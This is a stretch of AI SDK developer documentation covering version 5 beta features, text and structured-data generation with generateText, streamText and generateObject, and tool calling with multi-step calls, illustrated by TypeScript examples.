import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
import { ExampleMetadata } from './example-metadata-schema';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const startTime = Date.now();
const result = streamText({
model: openai('gpt-4o'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
messageMetadata: ({ part }): ExampleMetadata | undefined => {
// send custom information to the client on start:
if (part.type === 'start') {
return {
model: 'gpt-4o', // initial model id
};
}
// send additional model information on finish-step:
if (part.type === 'finish-step') {
return {
model: part.response.modelId, // update with the actual model id
duration: Date.now() - startTime,
};
}
// when the message is finished, send additional information:
if (part.type === 'finish') {
return {
totalTokens: part.totalUsage.totalTokens,
};
}
},
});
}
Finally, use the metadata type with useChat and render the (type-safe) metadata in your UI:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport, UIMessage } from 'ai';
import { ExampleMetadata } from './api/chat/example-metadata-schema';
type MyMessage = UIMessage<ExampleMetadata>;
export default function Chat() {
const { messages } = useChat<MyMessage>({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
return (
<div>
{messages.map(message => (
<div key={message.id} className="whitespace-pre-wrap">
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.metadata?.duration && (
<div>Duration: {message.metadata.duration}ms</div>
)}
{message.metadata?.model && (
<div>Model: {message.metadata.model}</div>
)}
{message.metadata?.totalTokens && (
<div>Total tokens: {message.metadata.totalTokens}</div>
)}
</div>
))}
</div>
);
}
UIMessageStream
The UI Message Stream enables streaming any content parts from the server to the client. With this stream, you can send structured data like custom sources from your RAG pipeline directly to your UI. The stream writer is a utility that makes it easy to write to this message stream.
const stream = createUIMessageStream({
execute: writer => {
// stream custom sources
writer.write({
type: 'source',
value: {
type: 'source',
sourceType: 'url',
id: 'source-1',
url: 'https://example.com',
title: 'Example Source',
},
});
},
});
On the client, these will be added to the ordered message.parts array.
Data Parts
The new stream writer enables a type-safe way to stream arbitrary data from the server to the client and display it in your UI.
You can create and stream custom data parts on the server:
// On the server
const stream = createUIMessageStream({
execute: writer => {
// Initial update
writer.write({
type: 'data-weather', // Custom type
id: toolCallId, // ID for updates
data: { city, status: 'loading' }, // Your data
});
// Later, update the same part
writer.write({
type: 'data-weather',
id: toolCallId,
data: { city, weather, status: 'success' },
});
},
});
On the client, you can render these parts with full type safety:
{
message.parts
.filter(part => part.type === 'data-weather') // type-safe
.map((part, index) => (
<Weather
key={index}
city={part.data.city} // type-safe
weather={part.data.weather} // type-safe
status={part.data.status} // type-safe
/>
));
}
Data parts appear in the message.parts array along with other content, maintaining the proper ordering of the conversation. You can update parts by referencing the same ID, enabling dynamic experiences like collaborative artifacts.
Enhanced useChat Architecture
AI SDK 5 introduces a new useChat architecture with transport-based configuration. This design makes state management and API integration flexible, allowing you to configure backend protocols without rewriting application logic.
The new useChat hook uses a transport system for better modularity:
- Transport Configuration – configure API endpoints and request handling through transport objects
- Enhanced State Management – improved message handling with the new UIMessage format
- Type Safety – stronger TypeScript support throughout the chat lifecycle
Configure useChat with the transport system:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat', // your chat endpoint
headers: { 'Custom-Header': 'value' },
}),
maxSteps: 5,
});
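The hook no longer manages form state for you; you keep your own input state and call sendMessage when the user submits. A hedged sketch (assuming the beta's sendMessage accepts a text part; the exact signature may shift during the beta):
// inside the component; assumes: const [input, setInput] = useState('');
const onSubmit = (e: React.FormEvent) => {
  e.preventDefault();
  sendMessage({ text: input }); // assumed beta signature
  setInput('');
};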
Server-Sent Events (SSE)
AI SDK 5 uses Server-Sent Events (SSE) instead of a custom streaming protocol. SSE is a common web standard for sending data from servers to browsers. This switch has several advantages:
- Works everywhere - Uses technology that works in all major browsers and platforms
- Easier to troubleshoot - See the data stream in browser developer tools
- Simpler to build upon - Adding new features is more straightforward
- More stable - Built on proven technology that many developers already use
Agentic Control
AI SDK 5 introduces new features for building agents that help you control model behavior more precisely.
prepareStep
The prepareStep function gives you fine-grained control over each step in a multi-step agent. It's called before a step starts and allows you to:
- Dynamically change the model used for specific steps
- Force specific tool selections for particular steps
- Limit which tools are available during specific steps
- Examine the context of previous steps before proceeding
const result = await generateText({
// ...
experimental_prepareStep: async ({ model, stepNumber, maxSteps, steps }) => {
if (stepNumber === 0) {
return {
// use a different model for this step:
model: modelForThisParticularStep,
// force a tool choice for this step:
toolChoice: { type: 'tool', toolName: 'tool1' },
// limit the tools that are available for this step:
experimental_activeTools: ['tool1'],
};
}
// when nothing is returned, the default settings are used
},
});
This makes it easier to build AI systems that adapt their capabilities based on context and task requirements.
stopWhen
The stopWhen parameter lets you define stopping conditions for your agent. Instead of running indefinitely, you can specify exactly when the agent should terminate based on various conditions:
- Reaching a maximum number of steps
- Calling a specific tool
- Satisfying any custom condition you define
const result = generateText({
// ...
// stop loop at 5 steps
stopWhen: stepCountIs(5),
});
const result = generateText({
// ...
// stop loop when weather tool called
stopWhen: hasToolCall('weather'),
});
const result = generateText({
// ...
// stop loop at your own custom condition
stopWhen: maxTotalTokens(20000),
});
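maxTotalTokens above is not a built-in; a sketch of how such a custom condition could look, assuming stop conditions receive the accumulated steps (mirroring stepCountIs):
// hypothetical helper: stop once total token usage across steps hits a budget
const maxTotalTokens =
  (budget: number) =>
  ({ steps }: { steps: Array<{ usage: { totalTokens: number } }> }) =>
    steps.reduce((sum, step) => sum + step.usage.totalTokens, 0) >= budget;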
These agentic controls form the foundation for building reliable, controllable AI systems that tackle complex problems while remaining within well-defined constraints.
Additional New Features
Tool Output Schema
Tools can now optionally specify an output schema for better type inference and validation:
import { tool } from 'ai';
import { z } from 'zod';
const weatherTool = tool({
description: 'Get weather information',
inputSchema: z.object({
city: z.string(),
}),
outputSchema: z.object({
temperature: z.number(),
conditions: z.string(),
}),
execute: async ({ city }) => ({
temperature: 72,
conditions: 'sunny',
}),
});
Tool Type Inference Helpers
New utility types simplify working with tool types:
import { InferToolInput, InferToolOutput, InferUITool } from 'ai';
import { weatherTool } from './weatherTool';
// Infer input and output types from tool definitions
type WeatherInput = InferToolInput<typeof weatherTool>;
type WeatherOutput = InferToolOutput<typeof weatherTool>;
type WeatherUITool = InferUITool<typeof weatherTool>;
// Use in UI message type definitions
type MyUIMessage = UIMessage<
never, // metadata type
UIDataTypes, // data parts type
{
weather: WeatherUITool;
}
>;
OpenAI Provider-Executed Tools
New built-in tools for OpenAI:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateText({
model: openai('gpt-4.1'),
tools: {
file_search: openai.tools.fileSearch(),
web_search_preview: openai.tools.webSearchPreview({
searchContextSize: 'high',
}),
},
messages,
});
Available tools:
- fileSearch: Search through uploaded documents using OpenAI's file search
- webSearchPreview: Web search capabilities (preview feature)
When using provider-defined tools like fileSearch and webSearchPreview, the tool execution results are automatically added to the message history, providing context for subsequent interactions.
This automatic message history inclusion ensures that:
- Tool execution context is preserved across conversation turns
- Follow-up questions can reference previously searched information
- The full conversation flow is maintained for debugging and logging
Enhanced Tool Streaming
Tools now support fine-grained streaming callbacks:
const weatherTool = tool({
inputSchema: z.object({ city: z.string() }),
onInputStart: ({ toolCallId }) => {
console.log('Tool input streaming started:', toolCallId);
},
onInputDelta: ({ inputTextDelta, toolCallId }) => {
console.log('Tool input delta:', inputTextDelta);
},
onInputAvailable: ({ input, toolCallId }) => {
console.log('Tool input ready:', input);
},
execute: async ({ city }) => {
return `Weather in ${city}: sunny, 72°F`;
},
});
Migration from AI SDK 4.x
Ready to upgrade from AI SDK 4.x to 5.0 Beta? We created a comprehensive migration guide to help you through the process.
The migration involves several key changes:
- Updated message format with UIMessage and ModelMessage types
- New useChat architecture with transport system
- New streaming protocol with Server-Sent Events
- Improved type safety and developer experience
View the complete Migration Guide →
The migration guide includes:
- Step-by-step upgrade instructions
- Detailed examples for each breaking change
- Best practices for adopting new features
title: Overview description: An overview of AI SDK Core.
AI SDK Core
Large Language Models (LLMs) are advanced programs that can understand, create, and engage with human language on a large scale. They are trained on vast amounts of written material to recognize patterns in language and predict what might come next in a given piece of text.
AI SDK Core simplifies working with LLMs by offering a standardized way of integrating them into your app - so you can focus on building great AI applications for your users, not waste time on technical details.
For example, here’s how you can generate text with various models using the AI SDK:
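A minimal sketch, assuming the OpenAI provider is installed (model IDs are illustrative):
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Explain quantum entanglement in one sentence.',
});
// switching providers is a one-line change, e.g.:
// import { anthropic } from '@ai-sdk/anthropic';
// model: anthropic('claude-3-5-sonnet-20240620'),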
AI SDK Core Functions
AI SDK Core has various functions designed for text generation, structured data generation, and tool usage. These functions take a standardized approach to setting up prompts and settings, making it easier to work with different models.
- generateText: Generates text and tool calls. This function is ideal for non-interactive use cases such as automation tasks where you need to write text (e.g. drafting email or summarizing web pages) and for agents that use tools.
- streamText: Stream text and tool calls. You can use the streamText function for interactive use cases such as chat bots and content streaming.
- generateObject: Generates a typed, structured object that matches a Zod schema. You can use this function to force the language model to return structured data, e.g. for information extraction, synthetic data generation, or classification tasks.
- streamObject: Stream a structured object that matches a Zod schema. You can use this function to stream generated UIs.
API Reference
Please check out the AI SDK Core API Reference for more details on each function.
title: Generating Text description: Learn how to generate text with the AI SDK.
Generating and Streaming Text
Large language models (LLMs) can generate text in response to a prompt, which can contain instructions and information to process. For example, you can ask a model to come up with a recipe, draft an email, or summarize a document.
The AI SDK Core provides two functions to generate text and stream it from LLMs:
- generateText: Generates text for a given prompt and model.
- streamText: Streams text from a given prompt and model.
Advanced LLM features such as tool calling and structured data generation are built on top of text generation.
generateText
You can generate text using the generateText function. This function is ideal for non-interactive use cases where you need to write text (e.g. drafting email or summarizing web pages) and for agents that use tools.
import { generateText } from 'ai';
const { text } = await generateText({
model: yourModel,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can use more advanced prompts to generate text with more complex instructions and content:
import { generateText } from 'ai';
const { text } = await generateText({
model: yourModel,
system:
'You are a professional writer. ' +
'You write simple, clear, and concise content.',
prompt: `Summarize the following article in 3-5 sentences: ${article}`,
});
The result object of generateText contains several properties:
- result.text: The generated text.
- result.reasoning: The reasoning text of the model (only available for some models).
- result.sources: Sources that have been used as input to generate the response (only available for some models).
- result.finishReason: The reason the model finished generating text.
- result.usage: The usage of the model during text generation.
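For instance, a short sketch reading a few of these properties:
const result = await generateText({
  model: yourModel,
  prompt: 'Write a haiku about the sea.',
});
console.log(result.text);
console.log(result.finishReason); // e.g. 'stop'
console.log(result.usage.totalTokens);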
Accessing response headers & body
Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.
You can access the raw response headers and body using the response property:
import { generateText } from 'ai';
const result = await generateText({
// ...
});
console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));
streamText
Depending on your model and prompt, it can take a large language model (LLM) up to a minute to finish generating its response. This delay can be unacceptable for interactive use cases such as chatbots or real-time applications, where users expect immediate responses.
AI SDK Core provides the streamText function which simplifies streaming text from LLMs:
import { streamText } from 'ai';
const result = streamText({
model: yourModel,
prompt: 'Invent a new holiday and describe its traditions.',
});
// example: use textStream as an async iterable
for await (const textPart of result.textStream) {
console.log(textPart);
}
You can use streamText on its own or in combination with AI SDK UI and AI SDK RSC.
The result object contains several helper functions to make the integration into AI SDK UI easier:
- result.toDataStreamResponse(): Creates a data stream HTTP response (with tool calls etc.) that can be used in a Next.js App Router API route.
- result.pipeDataStreamToResponse(): Writes data stream delta output to a Node.js response-like object.
- result.toTextStreamResponse(): Creates a simple text stream HTTP response.
- result.pipeTextStreamToResponse(): Writes text delta output to a Node.js response-like object.
It also provides several promises that resolve when the stream is finished:
- result.text: The generated text.
- result.reasoning: The reasoning text of the model (only available for some models).
- result.sources: Sources that have been used as input to generate the response (only available for some models).
- result.finishReason: The reason the model finished generating text.
- result.usage: The usage of the model during text generation.
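These resolve once streaming completes, so you can consume the stream and still read the final values afterwards:
const result = streamText({
  model: yourModel,
  prompt: 'Invent a new holiday and describe its traditions.',
});
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}
console.log(await result.finishReason); // resolves when the stream is done
console.log(await result.usage);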
onError callback
streamText immediately starts streaming to enable sending data without waiting for the model.
Errors become part of the stream and are not thrown to prevent e.g. servers from crashing.
To log errors, you can provide an onError callback that is triggered when an error occurs.
import { streamText } from 'ai';
const result = streamText({
model: yourModel,
prompt: 'Invent a new holiday and describe its traditions.',
onError({ error }) {
console.error(error); // your error logging logic here
},
});
onChunk callback
When using streamText, you can provide an onChunk callback that is triggered for each chunk of the stream.
It receives the following chunk types:
- text-delta
- reasoning
- source
- tool-call
- tool-result
- tool-call-streaming-start (when toolCallStreaming is enabled)
- tool-call-delta (when toolCallStreaming is enabled)
import { streamText } from 'ai';
const result = streamText({
model: yourModel,
prompt: 'Invent a new holiday and describe its traditions.',
onChunk({ chunk }) {
// implement your own logic here, e.g.:
if (chunk.type === 'text-delta') {
console.log(chunk.textDelta);
}
},
});
onFinish callback
When using streamText, you can provide an onFinish callback that is triggered when the stream is finished (see the API Reference).
It contains the text, usage information, finish reason, messages, and more:
import { streamText } from 'ai';
const result = streamText({
model: yourModel,
prompt: 'Invent a new holiday and describe its traditions.',
onFinish({ text, finishReason, usage, response }) {
// your own logic, e.g. for saving the chat history or recording usage
const messages = response.messages; // messages that were generated
},
});
fullStream property
You can read a stream with all events using the fullStream property.
This can be useful if you want to implement your own UI or handle the stream in a different way.
Here is an example of how to use the fullStream property:
import { streamText } from 'ai';
import { z } from 'zod';
const result = streamText({
model: yourModel,
tools: {
cityAttractions: {
parameters: z.object({ city: z.string() }),
execute: async ({ city }) => ({
attractions: ['attraction1', 'attraction2', 'attraction3'],
}),
},
},
prompt: 'What are some San Francisco tourist attractions?',
});
for await (const part of result.fullStream) {
switch (part.type) {
case 'text-delta': {
// handle text delta here
break;
}
case 'reasoning': {
// handle reasoning here
break;
}
case 'source': {
// handle source here
break;
}
case 'tool-call': {
switch (part.toolName) {
case 'cityAttractions': {
// handle tool call here
break;
}
}
break;
}
case 'tool-result': {
switch (part.toolName) {
case 'cityAttractions': {
// handle tool result here
break;
}
}
break;
}
case 'finish': {
// handle finish here
break;
}
case 'error': {
// handle error here
break;
}
}
}
Stream transformation
You can use the experimental_transform option to transform the stream.
This is useful for e.g. filtering, changing, or smoothing the text stream.
The transformations are applied before the callbacks are invoked and the promises are resolved.
If you e.g. have a transformation that changes all text to uppercase, the onFinish callback will receive the transformed text.
Smoothing streams
The AI SDK Core provides a smoothStream function that
can be used to smooth out text streaming.
import { smoothStream, streamText } from 'ai';
const result = streamText({
model,
prompt,
experimental_transform: smoothStream(),
});
Custom transformations
You can also implement your own custom transformations. The transformation function receives the tools that are available to the model, and returns a function that is used to transform the stream. Tools can either be generic or limited to the tools that you are using.
Here is an example of how to implement a custom transformation that converts all text to uppercase:
import type { TextStreamPart, ToolSet } from 'ai';
const upperCaseTransform =
<TOOLS extends ToolSet>() =>
(options: { tools: TOOLS; stopStream: () => void }) =>
new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
transform(chunk, controller) {
controller.enqueue(
// for text-delta chunks, convert the text to uppercase:
chunk.type === 'text-delta'
? { ...chunk, textDelta: chunk.textDelta.toUpperCase() }
: chunk,
);
},
});
You can also stop the stream using the stopStream function.
This is e.g. useful if you want to stop the stream when model guardrails are violated, e.g. by generating inappropriate content.
When you invoke stopStream, it is important to simulate the step-finish and finish events to guarantee that a well-formed stream is returned
and all callbacks are invoked.
const stopWordTransform =
<TOOLS extends ToolSet>() =>
({ stopStream }: { stopStream: () => void }) =>
new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
// note: this is a simplified transformation for testing;
// in a real-world version there would need to be
// stream buffering and scanning to correctly emit prior text
// and to detect all STOP occurrences.
transform(chunk, controller) {
if (chunk.type !== 'text-delta') {
controller.enqueue(chunk);
return;
}
if (chunk.textDelta.includes('STOP')) {
// stop the stream
stopStream();
// simulate the step-finish event
controller.enqueue({
type: 'step-finish',
finishReason: 'stop',
logprobs: undefined,
usage: {
completionTokens: NaN,
promptTokens: NaN,
totalTokens: NaN,
},
request: {},
response: {
id: 'response-id',
modelId: 'mock-model-id',
timestamp: new Date(0),
},
warnings: [],
isContinued: false,
});
// simulate the finish event
controller.enqueue({
type: 'finish',
finishReason: 'stop',
logprobs: undefined,
usage: {
completionTokens: NaN,
promptTokens: NaN,
totalTokens: NaN,
},
response: {
id: 'response-id',
modelId: 'mock-model-id',
timestamp: new Date(0),
},
});
return;
}
controller.enqueue(chunk);
},
});
Multiple transformations
You can also provide multiple transformations. They are applied in the order they are provided.
const result = streamText({
model,
prompt,
experimental_transform: [firstTransform, secondTransform],
});
Sources
Some providers such as Perplexity and Google Generative AI include sources in the response.
Currently sources are limited to web pages that ground the response.
You can access them using the sources property of the result.
Each url source contains the following properties:
- id: The ID of the source.
- url: The URL of the source.
- title: The optional title of the source.
- providerMetadata: Provider metadata for the source.
When you use generateText, you can access the sources using the sources property:
import { generateText } from 'ai';
import { google } from '@ai-sdk/google';
const result = await generateText({
model: google('gemini-2.0-flash-exp', { useSearchGrounding: true }),
prompt: 'List the top 5 San Francisco news from the past week.',
});
for (const source of result.sources) {
if (source.sourceType === 'url') {
console.log('ID:', source.id);
console.log('Title:', source.title);
console.log('URL:', source.url);
console.log('Provider metadata:', source.providerMetadata);
console.log();
}
}
When you use streamText, you can access the sources using the fullStream property:
const result = streamText({
model: google('gemini-2.0-flash-exp', { useSearchGrounding: true }),
prompt: 'List the top 5 San Francisco news from the past week.',
});
for await (const part of result.fullStream) {
if (part.type === 'source' && part.source.sourceType === 'url') {
console.log('ID:', part.source.id);
console.log('Title:', part.source.title);
console.log('URL:', part.source.url);
console.log('Provider metadata:', part.source.providerMetadata);
console.log();
}
}
The sources are also available in the result.sources promise.
Generating Long Text
Most language models have an output limit that is much shorter than their context window. This means that you cannot generate long text in one go, but it is possible to add responses back to the input and continue generating to create longer text.
generateText and streamText support such continuations for long text generation using the experimental continueSteps setting:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const {
text, // combined text
usage, // combined usage of all steps
} = await generateText({
model: openai('gpt-4o'), // 4096 output tokens
maxSteps: 5, // enable multi-step calls
experimental_continueSteps: true,
prompt:
'Write a book about Roman history, ' +
'from the founding of the city of Rome ' +
'to the fall of the Western Roman Empire. ' +
'Each chapter MUST HAVE at least 1000 words.',
});
Examples
You can see generateText and streamText in action using various frameworks in the following examples:
generateText
<ExampleLinks examples={[ { title: 'Learn to generate text in Node.js', link: '/examples/node/generating-text/generate-text', }, { title: 'Learn to generate text in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/generating-text', }, { title: 'Learn to generate text in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/generating-text', }, ]} />
streamText
<ExampleLinks examples={[ { title: 'Learn to stream text in Node.js', link: '/examples/node/generating-text/stream-text', }, { title: 'Learn to stream text in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/streaming-text-generation', }, { title: 'Learn to stream text in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/streaming-text-generation', }, ]} />
title: Generating Structured Data description: Learn how to generate structured data with the AI SDK.
Generating Structured Data
While text generation can be useful, your use case will likely call for generating structured data. For example, you might want to extract information from text, classify data, or generate synthetic data.
Many language models are capable of generating structured data, often defined as using "JSON modes" or "tools". However, you need to manually provide schemas and then validate the generated data as LLMs can produce incorrect or incomplete structured data.
The AI SDK standardises structured object generation across model providers
with the generateObject
and streamObject functions.
You can use both functions with different output strategies, e.g. array, object, or no-schema,
and with different generation modes, e.g. auto, tool, or json.
You can use Zod schemas, Valibot, or JSON schemas to specify the shape of the data that you want,
and the AI model will generate data that conforms to that structure.
Generate Object
The generateObject function generates structured data from a prompt.
The schema is also used to validate the generated data, ensuring type safety and correctness.
import { generateObject } from 'ai';
import { z } from 'zod';
const { object } = await generateObject({
model: yourModel,
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
Accessing response headers & body
Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.
You can access the raw response headers and body using the response property:
import { generateObject } from 'ai';
const result = await generateObject({
// ...
});
console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));
Stream Object
Given the added complexity of returning structured data, model response time can be unacceptable for your interactive use case.
With the streamObject function, you can stream the model's response as it is generated.
import { streamObject } from 'ai';
const { partialObjectStream } = streamObject({
// ...
});
// use partialObjectStream as an async iterable
for await (const partialObject of partialObjectStream) {
console.log(partialObject);
}
You can use streamObject to stream generated UIs in combination with React Server Components (see Generative UI) or the useObject hook.
See streamObject in action with these examples.
onError callback
streamObject immediately starts streaming.
Errors become part of the stream and are not thrown to prevent e.g. servers from crashing.
To log errors, you can provide an onError callback that is triggered when an error occurs.
import { streamObject } from 'ai';
const result = streamObject({
// ...
onError({ error }) {
console.error(error); // your error logging logic here
},
});
Output Strategy
You can use both functions with different output strategies, e.g. array, object, or no-schema.
Object
The default output strategy is object, which returns the generated data as an object.
You don't need to specify the output strategy if you want to use the default.
Array
If you want to generate an array of objects, you can set the output strategy to array.
When you use the array output strategy, the schema specifies the shape of an array element.
With streamObject, you can also stream the generated array elements using elementStream.
import { openai } from '@ai-sdk/openai';
import { streamObject } from 'ai';
import { z } from 'zod';
const { elementStream } = streamObject({
model: openai('gpt-4-turbo'),
output: 'array',
schema: z.object({
name: z.string(),
class: z
.string()
.describe('Character class, e.g. warrior, mage, or thief.'),
description: z.string(),
}),
prompt: 'Generate 3 hero descriptions for a fantasy role playing game.',
});
for await (const hero of elementStream) {
console.log(hero);
}
Enum
If you want to generate a specific enum value, e.g. for classification tasks,
you can set the output strategy to enum
and provide a list of possible values in the enum parameter.
Enum output is only available with generateObject.
import { generateObject } from 'ai';
const { object } = await generateObject({
model: yourModel,
output: 'enum',
enum: ['action', 'comedy', 'drama', 'horror', 'sci-fi'],
prompt:
'Classify the genre of this movie plot: ' +
'"A group of astronauts travel through a wormhole in search of a ' +
'new habitable planet for humanity."',
});
No Schema
In some cases, you might not want to use a schema,
for example when the data is a dynamic user request.
You can use the output setting to set the output format to no-schema in those cases
and omit the schema parameter.
import { openai } from '@ai-sdk/openai';
import { generateObject } from 'ai';
const { object } = await generateObject({
model: openai('gpt-4-turbo'),
output: 'no-schema',
prompt: 'Generate a lasagna recipe.',
});
Generation Mode
While some models (like OpenAI) natively support object generation, others require alternative methods, like modified tool calling. The generateObject function allows you to specify the method it will use to return structured data.
- auto: The provider will choose the best mode for the model. This recommended mode is used by default.
- tool: A tool with the JSON schema as parameters is provided and the provider is instructed to use it.
- json: The response format is set to JSON when supported by the provider, e.g. via json modes or grammar-guided generation. If grammar-guided generation is not supported, the JSON schema and instructions to generate JSON that conforms to the schema are injected into the system prompt.
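A minimal sketch of pinning a specific mode (the mode option takes the values above):
import { generateObject } from 'ai';
import { z } from 'zod';
const { object } = await generateObject({
  model: yourModel,
  mode: 'json', // override the default 'auto'
  schema: z.object({
    genre: z.string(),
  }),
  prompt: 'Classify the genre of this movie plot: "..."',
});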
Schema Name and Description
You can optionally specify a name and description for the schema. These are used by some providers for additional LLM guidance, e.g. via tool or schema name.
import { generateObject } from 'ai';
import { z } from 'zod';
const { object } = await generateObject({
model: yourModel,
schemaName: 'Recipe',
schemaDescription: 'A recipe for a dish.',
schema: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
prompt: 'Generate a lasagna recipe.',
});
Error Handling
When generateObject cannot generate a valid object, it throws an AI_NoObjectGeneratedError.
This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated a response that could not be parsed.
- The model generated a response that could not be validated against the schema.
The error preserves the following information to help you log the issue:
- text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode.
- response: Metadata about the language model response, including response id, timestamp, and model.
- usage: Request token usage.
- cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling.
import { generateObject, NoObjectGeneratedError } from 'ai';
try {
await generateObject({ model, schema, prompt });
} catch (error) {
if (NoObjectGeneratedError.isInstance(error)) {
console.log('NoObjectGeneratedError');
console.log('Cause:', error.cause);
console.log('Text:', error.text);
console.log('Response:', error.response);
console.log('Usage:', error.usage);
}
}
Repairing Invalid or Malformed JSON
Sometimes the model will generate invalid or malformed JSON.
You can use the repairText function to attempt to repair the JSON.
It receives the error, either a JSONParseError or a TypeValidationError,
and the text that was generated by the model.
You can then attempt to repair the text and return the repaired text.
import { generateObject } from 'ai';
const { object } = await generateObject({
model,
schema,
prompt,
experimental_repairText: async ({ text, error }) => {
// example: add a closing brace to the text
return text + '}';
},
});
Structured outputs with generateText and streamText
You can generate structured data with generateText and streamText by using the experimental_output setting.
generateText
// experimental_output is a structured object that matches the schema:
const { experimental_output } = await generateText({
// ...
experimental_output: Output.object({
schema: z.object({
name: z.string(),
age: z.number().nullable().describe('Age of the person.'),
contact: z.object({
type: z.literal('email'),
value: z.string(),
}),
occupation: z.object({
type: z.literal('employed'),
company: z.string(),
position: z.string(),
}),
}),
}),
prompt: 'Generate an example person for testing.',
});
streamText
// experimental_partialOutputStream contains generated partial objects:
const { experimental_partialOutputStream } = streamText({
// ...
experimental_output: Output.object({
schema: z.object({
name: z.string(),
age: z.number().nullable().describe('Age of the person.'),
contact: z.object({
type: z.literal('email'),
value: z.string(),
}),
occupation: z.object({
type: z.literal('employed'),
company: z.string(),
position: z.string(),
}),
}),
}),
prompt: 'Generate an example person for testing.',
});
More Examples
You can see generateObject and streamObject in action using various frameworks in the following examples:
generateObject
<ExampleLinks examples={[ { title: 'Learn to generate objects in Node.js', link: '/examples/node/generating-structured-data/generate-object', }, { title: 'Learn to generate objects in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/generating-object', }, { title: 'Learn to generate objects in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/generating-object', }, ]} />
streamObject
<ExampleLinks examples={[ { title: 'Learn to stream objects in Node.js', link: '/examples/node/streaming-structured-data/stream-object', }, { title: 'Learn to stream objects in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/streaming-object-generation', }, { title: 'Learn to stream objects in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/streaming-object-generation', }, ]} />
title: Tool Calling description: Learn about tool calling and multi-step calls (using maxSteps) with AI SDK Core.
Tool Calling
As covered under Foundations, tools are objects that can be called by the model to perform a specific task. AI SDK Core tools contain three elements:
- description: An optional description of the tool that can influence when the tool is picked.
- parameters: A Zod schema or a JSON schema that defines the parameters. The schema is consumed by the LLM, and also used to validate the LLM tool calls.
- execute: An optional async function that is called with the arguments from the tool call. It produces a value of type RESULT (generic type). It is optional because you might want to forward tool calls to the client or to a queue instead of executing them in the same process.
The tools parameter of generateText and streamText is an object that has the tool names as keys and the tools as values:
import { z } from 'zod';
import { generateText, tool } from 'ai';
const result = await generateText({
model: yourModel,
tools: {
weather: tool({
description: 'Get the weather in a location',
parameters: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
prompt: 'What is the weather in San Francisco?',
});
Tool calling is not restricted to only text generation. You can also use it to render user interfaces (Generative UI).
Multi-Step Calls (using maxSteps)
With the maxSteps setting, you can enable multi-step calls in generateText and streamText. When maxSteps is set to a number greater than 1 and the model generates a tool call, the AI SDK will trigger a new generation passing in the tool result until there
are no further tool calls or the maximum number of tool steps is reached.
By default, when you use generateText or streamText, it triggers a single generation (maxSteps: 1). This works well for many use cases where you can rely on the model's training data to generate a response. However, when you provide tools, the model can now choose to either generate a normal text response or generate a tool call. If the model generates a tool call, its generation is complete and that step is finished.
You may want the model to generate text after the tool has been executed, e.g. to summarize the tool results in the context of the user's query. In many cases, you may also want the model to use multiple tools in a single response. This is where multi-step calls come in.
You can think of multi-step calls in a similar way to a conversation with a human. When you ask a question, the person may need to look up information (use a tool) if the answer is not part of their common knowledge (a model's training data) before they can provide it. In the same way, the model may need to call a tool to get the information it needs to answer your question, where each generation (tool call or text generation) is a step.
Example
In the following example, there are two steps:
- Step 1
  - The prompt 'What is the weather in San Francisco?' is sent to the model.
  - The model generates a tool call.
  - The tool call is executed.
- Step 2
  - The tool result is sent to the model.
  - The model generates a response considering the tool result.
import { z } from 'zod';
import { generateText, tool } from 'ai';
const { text, steps } = await generateText({
model: yourModel,
tools: {
weather: tool({
description: 'Get the weather in a location',
parameters: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
maxSteps: 5, // allow up to 5 steps
prompt: 'What is the weather in San Francisco?',
});
You can use streamText in a similar way.
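For example, here is a minimal sketch of the same weather tool with streamText (yourModel is the same placeholder as above; the simplified execute function is illustrative only):
import { z } from 'zod';
import { streamText, tool } from 'ai';

const result = streamText({
  model: yourModel,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      parameters: z.object({ location: z.string() }),
      execute: async ({ location }) => ({ location, temperature: 72 }),
    }),
  },
  maxSteps: 5,
  prompt: 'What is the weather in San Francisco?',
});

// the text stream contains the text from all steps:
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}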
Steps
